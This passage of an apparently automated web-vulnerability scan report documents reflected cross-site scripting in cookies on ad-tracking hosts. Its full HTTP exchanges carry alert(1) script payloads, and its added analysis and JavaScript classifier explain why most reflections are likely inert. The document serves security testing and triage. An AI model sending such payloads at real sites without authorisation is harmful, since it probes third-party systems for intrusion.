Cookie: C3UID=13014572191303613803b640b<script>alert(1)</script>fe55219a755; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-39-05_9323346991304955545; expires=Sat, 07-May-2016 15:39:05 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_9323346991304955545; expires=Mon, 09-May-2011 15:54:05 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803b640b<script>alert(1)</script>fe55219a755';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='9323346991304955545';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcal
...[SNIP]...

2.144. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the response without encoding. The payload 5b9d6<script>alert(1)</script>936b389d1ff was submitted in the BMX_3PC cookie and echoed unmodified in the application's response.

The scanner classifies the reflection as plain text between HTML tags, but the response is served as application/x-javascript and the value lands inside a single-quoted JavaScript string literal in the cookie dump the script builds ("BMX_3PC": '15b9d6<script>alert(1)</script>936b389d1ff' below). Loaded through a script element, a <script> tag inside a string literal is inert; the test that matters in this context is whether a single quote in the cookie value survives unencoded, which this report does not demonstrate.

Because the reflected data arrives in a cookie, exploiting it against another user requires a means of setting an arbitrary BMX_3PC value in the victim's browser for this domain, and the response resets BMX_3PC to 1 on every request, so a planted value is consumed once. These limitations considerably mitigate the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=15b9d6<script>alert(1)</script>936b389d1ff; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:25 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
91151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '15b9d6<script>alert(1)</script>936b389d1ff', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...
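
The two cookie findings above, and the voicefive findings that follow, are all labelled "plain text between tags" although the captured bodies put the canary inside a quoted JavaScript string. The check a practitioner wants before rating such a finding is a context classification of the actual response. The following is an added example, not part of the report: classifyContext and SAMPLES are assumptions for illustration, and the sample bodies are short excerpts of the responses reproduced in 2.141 to 2.144 of this report.

```javascript
// Added example, not part of the report: find a scanner canary in a
// captured response body and classify the lexical context it landed in.
// classifyContext and SAMPLES are assumptions for illustration.
const QUOTE = { single: "'", double: '"', template: '`' };

// Walk the body up to the canary as a JavaScript/CSS lexer would, tracking
// whether the cursor is in code, a quoted literal, or a comment. Regex
// literals are not modelled, which is adequate for these responses.
function classifyContext(body, canary) {
  const at = body.indexOf(canary);
  if (at < 0) return { found: false };
  let state = 'code';
  for (let i = 0; i < at; i++) {
    const c = body[i], n = body[i + 1];
    if (state === 'code') {
      if (c === '/' && n === '/') { state = 'line-comment'; i++; }
      else if (c === '/' && n === '*') { state = 'block-comment'; i++; }
      else if (c === "'") state = 'single';
      else if (c === '"') state = 'double';
      else if (c === '`') state = 'template';
    } else if (state === 'line-comment') {
      if (c === '\n') state = 'code';
    } else if (state === 'block-comment') {
      if (c === '*' && n === '/') { state = 'code'; i++; }
    } else {                                   // inside a quoted literal
      if (c === '\\') i++;                     // skip the escaped character
      else if (c === QUOTE[state]) state = 'code';
      else if (c === '\n' && state !== 'template') state = 'code'; // unterminated
    }
  }
  const quote = QUOTE[state];
  return {
    found: true,
    offset: at,
    context: state,
    // A payload only leaves a string literal if it carries the delimiter.
    breaksOut: quote !== undefined && canary.includes(quote),
    // Whether it would be markup if the response were rendered as HTML.
    markup: /<[a-zA-Z][^>]*>/.test(canary),
  };
}

// Excerpts of the responses reproduced in this report.
const SAMPLES = {
  // 2.143, c3metrics: served as text/html, body is JavaScript
  c3metrics: {
    body: "this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803b640b<script>alert(1)</script>fe55219a755';",
    canary: 'b640b<script>alert(1)</script>fe55219a755',
  },
  // 2.144, voicefive cookie dump: served as application/x-javascript
  voicefive: {
    body: "\"UID\": '875e3f1e-184.84.247.65-1303349046', \"BMX_3PC\": '15b9d6<script>alert(1)</script>936b389d1ff', \"ar_p92429851\": 'exp=4',",
    canary: '5b9d6<script>alert(1)</script>936b389d1ff',
  },
  // 2.142, adsafeprotected jsref: the payload carries the delimiter
  adsafe: {
    body: 'var adsafeVisParams = {\n   mode : "jss",\n   jsref : "http://www.google.com/search?hl=en&q=95704"-alert(1)-"f83d1186636",\n',
    canary: '95704"-alert(1)-"f83d1186636',
  },
  // 2.141, gzip.php stylesheet bundle: reflection inside a line comment
  gzip: {
    body: ".ui-helper-hidden{display:none;}\n// FILE NOT FOUND 'css/style/9454e<img src=a onerror=alert(1)>a76a89d3b38.css'\n",
    canary: '9454e<img src=a onerror=alert(1)>a76a89d3b38',
  },
};
```

Run over the four excerpts, the classifier reports single-quoted string for both cookie reflections with breaksOut false (the payload never contains a single quote), double-quoted string with breaksOut true for the Referer finding, and line-comment for the stylesheet bundle; the markup flag separates the findings that would matter if the response were rendered as HTML from those that would not.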

2.145. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the response without encoding. The payload 8bb0a<script>alert(1)</script>c3eff6b973a was submitted in the BMX_G cookie and echoed unmodified in the application's response.

The scanner classifies the reflection as plain text between HTML tags, but the response is served as application/x-javascript and the value lands inside a single-quoted JavaScript string literal in the cookie dump the script builds ("BMX_G": 'method->-1,ts->13049549858bb0a<script>alert(1)</script>c3eff6b973a' below). Loaded through a script element, a <script> tag inside a string literal is inert; the test that matters in this context is whether a single quote in the cookie value survives unencoded, which this report does not demonstrate.

Because the reflected data arrives in a cookie, exploiting it against another user requires a means of setting an arbitrary BMX_G value in the victim's browser for this domain. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->13049549858bb0a<script>alert(1)</script>c3eff6b973a; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:25 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
15:29:45 2011&prad=253735207&arc=178113566&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&', "BMX_G": 'method->-1,ts->13049549858bb0a<script>alert(1)</script>c3eff6b973a', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2
...[SNIP]...

2.146. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the response without encoding. The payload c5b11<script>alert(1)</script>a7db032d736 was submitted in the UID cookie and echoed unmodified in the application's response.

The scanner classifies the reflection as plain text between HTML tags, but the response is served as application/x-javascript and the value lands inside a single-quoted JavaScript string literal in the cookie dump the script builds ("UID": '875e3f1e-184.84.247.65-1303349046c5b11<script>alert(1)</script>a7db032d736' below). Loaded through a script element, a <script> tag inside a string literal is inert; the test that matters in this context is whether a single quote in the cookie value survives unencoded, which this report does not demonstrate.

Because the reflected data arrives in a cookie, exploiting it against another user requires a means of setting an arbitrary UID value in the victim's browser for this domain. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046c5b11<script>alert(1)</script>a7db032d736

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:25 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046c5b11<script>alert(1)</script>a7db032d736', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "BMX_3PC": '1', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&rec
...[SNIP]...

2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the response without encoding. The payload 77feb<script>alert(1)</script>412f9aebed7 was submitted in the ar_p81479006 cookie and echoed unmodified in the application's response.

The scanner classifies the reflection as plain text between HTML tags, but the response is served as application/x-javascript and the value lands inside a single-quoted JavaScript string literal in the cookie dump the script builds (the "ar_p81479006" entry below). Loaded through a script element, a <script> tag inside a string literal is inert; the test that matters in this context is whether a single quote in the cookie value survives unencoded, which this report does not demonstrate.

Because the reflected data arrives in a cookie, exploiting it against another user requires a means of setting an arbitrary ar_p81479006 value in the victim's browser for this domain. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&77feb<script>alert(1)</script>412f9aebed7; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&77feb<script>alert(1)</script>412f9aebed7', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&
...[SNIP]...

2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the response without encoding. The payload 6bb85<script>alert(1)</script>baaf6050393 was submitted in the ar_p82806590 cookie and echoed unmodified in the application's response.

The scanner classifies the reflection as plain text between HTML tags, but the response is served as application/x-javascript and the value lands inside a single-quoted JavaScript string literal in the cookie dump the script builds (the "ar_p82806590" entry below). Loaded through a script element, a <script> tag inside a string literal is inert; the test that matters in this context is whether a single quote in the cookie value survives unencoded, which this report does not demonstrate.

Because the reflected data arrives in a cookie, exploiting it against another user requires a means of setting an arbitrary ar_p82806590 value in the victim's browser for this domain. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&6bb85<script>alert(1)</script>baaf6050393; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=41&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:35:24 2011&prad=253732017&arc=194941149&; expires=Sun 07-Aug-2011 15:35:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25787

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941149",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&', "ar_p82806590": 'exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&6bb85<script>alert(1)</script>baaf6050393', "BMX_3PC": '1', "BMX_G": 'method->
...[SNIP]...

2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the response without encoding. The payload afe4a<script>alert(1)</script>2a7bdbc50e5 was submitted in the ar_p84552060 cookie and echoed unmodified in the application's response.

The scanner classifies the reflection as plain text between HTML tags, but the response is served as application/x-javascript and the value lands inside a single-quoted JavaScript string literal in the cookie dump the script builds (the "ar_p84552060" entry below). Loaded through a script element, a <script> tag inside a string literal is inert; the test that matters in this context is whether a single quote in the cookie value survives unencoded, which this report does not demonstrate.

Because the reflected data arrives in a cookie, exploiting it against another user requires a means of setting an arbitrary ar_p84552060 value in the victim's browser for this domain. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941149 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&afe4a<script>alert(1)</script>2a7bdbc50e5; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=40&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:29:45 2011&prad=253735207&arc=178113566&; BMX_G=method->-1,ts->1304954985; 